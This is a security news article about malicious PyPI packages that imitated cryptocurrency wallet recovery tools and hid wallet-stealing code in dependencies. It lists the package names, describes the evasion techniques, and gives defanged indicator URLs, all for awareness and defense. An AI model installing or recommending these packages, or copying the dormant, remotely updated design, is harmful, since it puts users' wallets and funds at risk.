Malicious PyPI Packages Mimics a Legitimate Tools


Threat actors target the “PyPI” primarily due to its vast user base and the ease of distributing malicious packages within an “open-source ecosystem.”

The decentralized nature of “PyPI” complicates monitoring efforts which makes it an attractive platform for threat actors seeking to “compromise developer environments” and “disrupt the software supply chain.”

EHA

Checkmarx researchers recently found PyPI is under attack and discovered malicious crypto-stealing packages.

A malicious user on PyPI directed a sophisticated “supply chain attack” on 22nd September by “uploading multiple deceptive packages” like “AtomicDecoderss,” “TrustDecoderss,” “WalletDecoderss,” and “ExodusDecodes.”

Analyse Any Suspicious Links Using ANY.RUN’s New Safe Browsing Tool: Try for Free

TrustDecoderss and ExodusDecodes (Source – Medium)

These packages presented themselves as legitimate tools for managing cryptocurrency wallets like “Atomic,” “Trust Wallet,” “Metamask,” “Ronin,” “TronLink,” and “Exodus.”

While appearing to help users recover “mnemonic phrases” (12-24 word backup passwords) and decrypt wallet data, the packages implemented a complex malware strategy through “dependency poisoning.”

Here the malicious code was hidden in supporting packages named “cipherbcryptors” and “ccl_leveldbases” rather than the main package, Checkmark added.

The attacker enhanced credibility via professionally crafted “README files” (documentation) with “fake download statistics” and “usage instructions.”

When users installed these packages, the hidden malicious code would activate and steal sensitive cryptocurrency data.

While it includes “private keys” and “mnemonic phrases,” which give the attackers complete access to victims’ cryptocurrency funds worth “millions of dollars.”

A sophisticated supply chain attack in the “Python ecosystem” using multiple layers of “deception” and “technical sophistication” is represented by the “cipherbcryptors” package. ⁤⁤

The malware employed “heavy code obfuscation techniques” to mask its true functionality while implementing a “dynamic C2 server infrastructure” that retrieved addresses externally rather than “hard-coding” them.

Attack flow (Source – Medium)

⁤The package remained dormant during “installation” to evade “security scans,” activating only when users called specific cryptocurrency functions. ⁤

The malware targeted various cryptocurrency wallets once it was triggered by searching for sensitive data.

While the sensitive data includes “private keys,” “mnemonic seed phrases,” “wallet balances,” and “transaction histories” in specific file locations and “data structures.” ⁤

Here below we have mentioned all the identified packages:-

  • atomicdecoderss
  • trondecoderss
  • phantomdecoderss
  • trustdecoderss
  • exodusdecoderss
  • walletdecoderss
  • ccl-localstoragerss
  • exodushcates
  • cipherbcryptors
  • ccl_leveldbases

⁤The stolen information was then “encoded” and “exfiltrated” to the attacker’s remote servers via a “carefully directed process.” ⁤⁤

This supply chain attack was particularly dangerous due to its combination of “false popularity metrics,” “detailed documentation,” “strategic package naming,” and the “ability to dynamically fetch and execute external code” without package updates. ⁤⁤

The architecture of the malware allowed it to bypass traditional “static analysis tools” while maintaining the flexibility to modify its attack patterns via “remote updates.” ⁤⁤

This illustrates the evolving sophistication of open-source software supply chain attacks.

IOCs

  • hxxps[:]//pastebin[.]com/raw/FZUp6ESH
  • hxxps://decry[.]in/check

Free Webinar on How to Protect Small Businesses Against Advanced Cyberthreats -> Free Webinar



Source link